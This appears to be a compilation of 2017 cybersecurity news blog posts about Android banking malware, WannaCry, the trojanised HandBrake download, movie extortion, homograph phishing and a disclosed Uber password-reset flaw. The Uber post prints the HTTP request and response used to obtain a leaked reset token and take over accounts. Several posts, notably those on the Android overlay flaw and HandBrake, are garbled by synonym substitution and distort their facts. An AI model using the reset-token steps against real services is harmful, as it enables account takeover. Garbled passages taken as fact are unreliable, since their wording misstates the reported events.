Russian hackers rob a million from bank customers


A Russian cyber hacking group, “Cron” has used malicious apps and software to infect around 1 million android smartphones and steal 50 million roubles (around £677,000 or $892,000) from domestic bank customers. According to Group-IB, the cyber security firm investigating the attack with the Russian Interior Ministry, the group infected smartphones at a rate of 3,500 devices a day.


The group of 20 hackers had purchased a more powerful piece of malware and it was planning to expand the attack to European financial leaders before being arrested. The core members of the group were arrested on November 22 last year. The group began targeting French firms Credit Agricole, BNP Paribas and Societe General but no funds were stolen from customers.


The cron group, named after the malware they used-disguised the malware as fake banking applications, ecommerce and pornography web clients. When Android users in Russia searched online, the search engine results would suggest the fake apps and users would be tricked into downloading the phony version. After having control over the infected smartphone, hackers were able to send SMS messages to the mobile users’ banks instructing the transfer of money- up to $120 to one of the 6,000 fraudulent accounts. They intercepted the transaction confirmation codes, preventing the victims from receiving messages notifying them about the transaction. The attack was able to bypass two-factor authentication features that would require a user to enter a secondary code—often sent via text message—to confirm their identity.

“Cron’s success was due to two main factors,” Dmitry Volkov, head of investigations at Group-IB, said in a statement. “First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement.”

They targeted customers of Sberbank, Alfa Bank, and online payments company Qiwi, exploiting SMS text message transfer services.

“Group-IB first learnt about Cron in March 2015: Group-IB’s Intelligence system tracked the activity of a new criminal group that was distributing malicious programs named ‘viber.apk’, ‘Google-Play.apk’, ‘Google_Play.apk’ for Android OS on underground forums,” explained the cyber security company.

The situation came to light when sources close to the investigation tipped off Reuters.

The Russian hackers rented a “Tiny.z,” a piece of malware designed to attack checking accounts systems, for $2,000 a month in June 2016, and adapted it to target European banks in Britain, Germany, France, the United States, and Turkey, among other countries.

Luckily for the people with infects smartphones and unfortunately for the hackers, only small sums can be transferred via SMS instructions, so despite the volume of devices affected, the amount of money the hackers stole was not astronomical.

A total of 16 people have been arrested thus far in relation to the case, including a 30-year old man who is believed to be the leader of the group operating across six different regions of Russia.

The exploit highlighted the dangers of SMS messages in mobile banking. SMS banking services are used in Russia to help people living in isolated areas, where access to banks is not easy. But security always has to outweigh consumer convenience.

Android defect opens path for malware to users, not resolving for the time being

(pc-Google Images)
A security powerlessness in the Android working framework (OS) that gives malevolent applications a chance to commandeer a gadget's screen has apparently left almost 40% of clients defenseless against ransomware, keeping money malware and adware – however Google says it won't be settled for quite a long time.

The defect was found in a center security instrument of Android 6.0.0 (Marshmallow) or more, which in light of authority insights is 38.3% of gadgets. Google has affirmed it knows about the issue yet says the bug won't be settled until the arrival of 'Android O' in Q3 2017.

According to experts at cybersecurity firm Check Point, the problem persists due to a Google policy which grants certain permissions to applications directly installed from the official Play Store.

The faulty model – "SYSTEM_ALERT_WINDOW" – allows apps to "overlap" on a device's screen. 

This, as the researchers noted in a blog post this week (9 May), is one key method used by hackers and cybercriminals to trick unwitting Android users into falling for malware and phishing scams that can result in ransomware, banking Trojans and adware.

Check Point said more than 70% of ransomware (malware that secures a framework until cash is paid to the programmer), more than half of adware and about 15% saving money malware spreads by abusing this sort of consent. "This is unmistakably not a minor danger," specialists said.

In a past transitory settle, Google divulged a fix for Android 6.0.1 that permitted the Play Store application itself to have improved control over authorizations, yet it apparently exploded backward. On the off chance that a vindictive application was downloaded from Play it would be "consequently conceded" the consent.

The specialists stated: "Since Google comprehended the dangerous way of this authorization it made the unmistakable procedure to favor it. This soon brought about issues, as this authorization is additionally utilized by authentic applications, for example, Facebook, which requires it for its Messenger talk."

While Google right now utilizes a framework known as "Bouncer" to consequently examine applications trying to battle off those containing infections, some can in any case get lost in an outright flood. As of late, revealed strains have included "BankBot" and 'FalseGuide'.

"Be careful with fishy applications," the scientists cautioned, including: "Clients ought to dependably be careful with noxious applications, notwithstanding when downloading from Google Play. Take a gander at the remarks left by different clients, and just give authorizations which have pertinent setting for the application's motivation."

As per Android Police, an innovation site, the Android "O" engineer see will incorporate four discharges ahead of time of the last form, right now set to hit the application stores in Q3. A correct date has not been declared, but rather we as of late got a look at Google's new Fuchsia OS.

Hackers Hit Russian Bank, Planned to hit other European bank

Russian hackers used malware planted on Android mobile devices to steal money from domestic bank customers using fake banking apps.

The group is known as 'Cron', and now is in custody. They were planning a major attack on other European bank customers and European leaders before their arrest.

According to the reports compiled by cyber security firm Group-IB which is investigating the case with the Russian Interior Ministry said that  the hacking  group  tricked the Android users  into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce programs.

After downloading the malaware into the phones, it  blocked any incoming messages or notification from banks on transactions made. As a result users were not aware of any kind of  money transfers until they checked later.

The hackers had planned  to attack other  big European banks including France's Credit Agricole, BNP Paribas, and Societe Generale.

While Google has blocked this app, but being the open OS it is easy for hackers to find ways to bypass firewall and insert malicious malwares. 

Is North Korea behind WannaCry Attack?

For the recent string of cyber attacks that affected 300000 computers in 150 countries around the world earlier this month, a secretive unit is being blamed and according to the sources, its Unit 180, a secretive agency of North Korea. And the west is in real trouble because of North Korea's cyber warfare cell.

According to a cyber security expert, Unit 180 which forms part of the Reconnaissance General Bureau(RGB) and is main overseas intelligence agency for North Korea has its eyes and ears on Australia and they are trying to damage South Korean people, assets, and aircraft's in Australia. Recently North Korea has threatened Australia for millie attack as well but right now it's the cyber space attack that is the main concern for Australia right now.

“North Korea is almost certainly conducting cyber espionage against South Korean targets here,” said Dr Greg Austin, a Professor in the Australian Centre for Cyber Security at the University of New South Wales and he insisted that North Korea has very active cyber space participation in Australia.
According to Dr Austin, North Korea has 6000 cyber warriours in the country and other cells that are active in northern China . Sometimes these warriors are sent to different countries like China and other parts of eastern europe where internet speeds are good to attack financial and other security related websites of US , South Korea and other various countries .  According to him , these units have very young people as employees and they have been trained at their schools in cyber securities.

“Unit 121 has 600 of its 1800 cyber staff dedicated to disabling South Korean military command and control in the event of war,” he told the seminar last week.

Related to the recent "Wannacry" incident, Dr Austin said that it can't be confirmed that global attack was carried by North Korea cyber cell.

“And if North Korea was behind the global attacks (WannaCry) then this could also affect Australia as well,” Dr Austin said.

Cyber security profesionals have found technical evidences that could link North Korea with the wannacry "ransomeware" attack that had affected more than 150 countries last week, but Pyongyang has called the allegation  as “ridiculous”.

WannaCry started a new debate: How much safe is Cashless society?

WannaCry ransomware has started a debate around the world about the safety of cyberspace.
Now after this attack,  It is quite evident that no government, no financial institution, Anti-virus software developer, or either ‘whatever’ is is really capable of stopping cyber attacks.

But still, government around the world is trying to eliminate the cash. How people can trust with this kind of cyber security?

Even if people start using digital mode of payment with this kind of cyber security then if some ransomware like WannaCry hit the cyber space then, as a result, nobody will be able to buy food.
Some of these essential and logical questions were answered by ArmstrongEconomics.com

"The WannaCry ransom attack is actually variant from a February 2015 sample attributed to the Lazarus Group, a Kaspersky-tracked actor tied to the North Korean government. Parts of the code go beyond shared code. It appears to be written by the same programmer.

Let’s get something straight here. At the core of those responsible is really the NSA and Microsoft itself. The attack exploited a Windows networking protocol to spread within networks, and while Microsoft released a patch nearly two months ago, it’s become very clear that patch didn’t reach all users particularly because institutions often do not install patches fearing that proprietary software may not function.

If behind the curtain we have government demanding back-doors into iPhones and computer so they can listen to everything everywhere, well guess what – so can everyone else. Patches will work for individual users, but not major institutions. Trying to upgrade their operations is a real effort. They are slow to act and thus vulnerable.

The NSA was well aware of this little trick. The real answer is the NSA and FBI must do the investigation the old fashion way. Stop asking for secret back-doors that never remain secret very long. The entire world will become vulnerable and they use to counterfeit an adversary’s currency to undermine their economy. Today, if we keep this nonsense up, they will hack into the entire thing and shut it down.

The idea of moving to a cashless society is just insane. Somebody has to give up something here. Trust me – the intelligence community will not take responsibility."

Rise in shares of Cyber Security stocks after WannaCry attack

There has been an expolential surge in the stock of cybersecurity since the WannaCry ramsomeware has hit at least 150 countries.

Cybersecurity stocks surged on Monday following a Friday cyberattack which hit at least 150 countries and affected computers in factories and hospitals.

"These attacks help focus the minds of chief technology officers across corporations to make sure security protocols are up to date, and you often see bookings growth at cybersecurity companies as a result," said Neil Campling, head of technology research at Northern Trust.

The share market of the cyber security stocks around the world were reported  all time high after the WannaCry attack.

In London, the shares of Sophos(SOPH.L), a cloud network security firm saw a record high  jump of  more than 7 percent, and shares of NCC Group (NCCG.L), a security firm to  rose 2.7 percent.

WHile in U.S  FireEye (FEYE.O) saw the highest jump in its share value, and Symantec (SYMC.O) and Palo Alto Networks (PANW.N) rose around 3 percent.

The cyber security ETF (HACK.K) rose 3.3 percent.

According to  the cyber security firm PGI, by 2020 there will be increase of 10 percent spending  on cyber security protection by the companies in Britain and Europe.

"In many companies, there's been an increase in investment in IT but not in the security that sits around it, so this investment is likely to play a bit of catch-up," PGI report.

DVD-ripping app carrying Malwares after hacking

(pc- Google Images)
As though it weren't at that point sufficiently troublesome to avoid suspicious downloaded programs, a few programmers have figured out how to penetrate even authentic wellsprings of programming to transform them into wellsprings of malware.

That was the situation a week ago when it was found that HandBrake, a prevalent open source DVD-tearing and transcoding project, was helping and introducing the OSX.Proton malware through no blame of HandBrake itself. It's all since somebody figured out how to hack HandBrake's site and supplant a genuine duplicate of the program with a tainted one.

The indication of a malware-contaminated duplicate of HandBrake would have gotten away easygoing macOS clients. Whenever run, the fake duplicate of HandBrake would request administrator benefits, something the untainted program never did and never expected to do. On the off chance that the clueless client entered the asked for qualifications, consider the Mac traded off. 

The uplifting news is that the bogus duplicate of HandBrake has now been expelled from the source's site and supplanted with a perfect one. The awful news is that the circumstance isn't as straightforward. Numerous product locales give checksums that clients can use to approve that the duplicate they downloaded matches what the product creators transferred. In the event that the checksum doesn't coordinate, then the downloaded is either debased or you got a possibly altered bundle.

In typical cases, that would be a sufficient protect. Yet, in this specific circumstance, it was simply the site that was hacked. As such, the programmer could have additionally supplanted those checksums with his or her own corrupted marks. Unless HandBrake has made sense of how the hack occurred and have introduced essential protections, clients have next to no affirmation now. 

OSX.Proton is upto some degree known malware that introduces an indirect access on Macs. The somewhat uplifting news is that Proton itself seems to have been really surrey and temperamental, once in a while neglecting to introduce its payload. It's right around a stroke of misfortune that HandBrake happens to be the second programming from a similar engineer, the first being BitTorrent customer Transmission, to be hacked and utilized as a part of thusly.

Stealing of Movies for extortion - Baahubali 2 the latest victim

Baahubali 2 has become another victim of the extortion racket targeted at movies. However, like a typical movie, this seems to have had a good ending. Sixteen perpetrators of this incident have been arrested for stealing a copy of Baahubali 2 and demanding a ransom from the producers of the movie, Arka Mediaworks Entertainment Ltd.

This greedy gang of sixteen threatened to publish the movie on the Internet, if a ransom was not paid. According to India.com, representatives of Arka Mediaworks refused to pay the blackmailers and immediately called the police.

As part of the tactics used to identify the perpetrators, the police asked Arka Mediaworks to play along and seek proof that the movie was indeed stolen. The perpetrators did not know that the copy of the film was "cleverly" marked for copy protection and provided the company with a filler from the movie.

This allowed law enforcement agencies to trace the stolen copy to a specific theatre whose owner was soon arrested. Torrent Freak notes that watermarks allow producers to track exactly where a cam-copy of movie was made, but in this case attackers had digital copy of the film. This suggests that the perpetrators had managed to secure the encryption key which is required to decrypt content (or the movie in this case).

While the owner of the theatre was one of the sixteen arrested, it was also learnt that two of the arrested had been detained in 2015 as well for dealing in pirated copies of Baahubali 1! Old habits do die hard...

The Baahubali incident was not an isolated one. In recent months, hackers put 10 episodes of the new season of the series "Orange Is The New Black" on the internet. The hacker/s - known as the Dark Overlord is said to have stated that representatives of Netflix and Larson Studios refused to pay the ransom, and thus the online posting in retaliation.

It has been learnt that hackers also sought to blackmail Disney by threatening to publish from the latest movie in the Pirates of the Caribbean franchise, Dead Men Tell No Tales.


- Christina

Fake website "шһатѕарр.com" masquerades as the WhatsApp.com

Reddit users have recently noticed a new malicious campaign to hoodwink users of messenger WhatsApp. Apparently, some hackers have sent links to poor victims, supposedly leading to the official website of WhatsApp (whatsapp.com), while in reality the links lead to the fake domain шһатѕарр.com.

Clink on the link and one is presented with an invitation to trouble. A "clicker" is redirected to the fake site and made an offer of an exciting app to make messages colourful.

Users are asked to share the link with friends and groups in social networks, ostensibly to make sure that the user is not robot. For all this trouble, victims are "gifted" with adware instead of colored "WhatsApp" messages.

However, in what is surely a relief, Google has already removed the app from the Chrome Store. This is not for the first time that hackers are using international characters and Unicode domain names. Previously, google.com converted into ɢoogle.com.

 In April, 2017 Chinese expert Xudong Zheng warned that Chrome, Firefox and Opera are vulnerable to virtually undetectable phishing attacks by which attackers can register fake domains that seemingly indistinguishable from the real resources of Apple, Google, eBay, Amazon and many other companies.

- Christina

Improper Authentication vulnerability allow anyone to reset password in UBER

An Italian security expert Vincenzo C., who is popular on Twitter as @Procode701, has discovered a critical  Authentication vulnerability in UBER  by which anyone can reset the password for any account.

The company held the Bug Bounty program which was operated by Hackerone where the researcher found the ‘Improper Authentication’ vulnerability.

A summary published by the UBER explains, “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.”

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The security expert found out that the vulnerability in the reset password could be exploited to generate an authentication token “inAuthSessionID”, and then anyone could use this to change the password for any account.

Here is the UBER Improper Authentication flaw

To change the password for any account you just need to obtain a session token “inAuthSessionID” and then using the standard link that is present in the change password form you can easily change the password.
https://auth.uber.com/login/stage/PASTE SESSION ID <— inAuthSessionID generated through the chaneg password email  /af9b9d0c-bb98-41de-876c-4cb911c79bd1 <– tokenID with no expiration date.
POST /login/handleanswer HTTP/1.1
Host: auth.uber.com
{ "init": false,
   "answer": {
      "type": "PASSWORD_RESET_WITH_EMAIL",
      "userIdentifier": {
          "email": "xxxx@uber.com"
      }
   }
}
Reply
HTTP/1.1 200 OK

{
     "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
     "stage": {
         "question": {
                       "signinToken": "",
                       "type": "VERIFY_PASSWORD_RESET",
                        "tripChallenges": []
                     },
                     "alternatives": []
      }
}

The impact of this vulnerability is very severe, it allow a hackers to access any account and any user’s data (i.e. ID Card, banking data, Driver License), including financial one.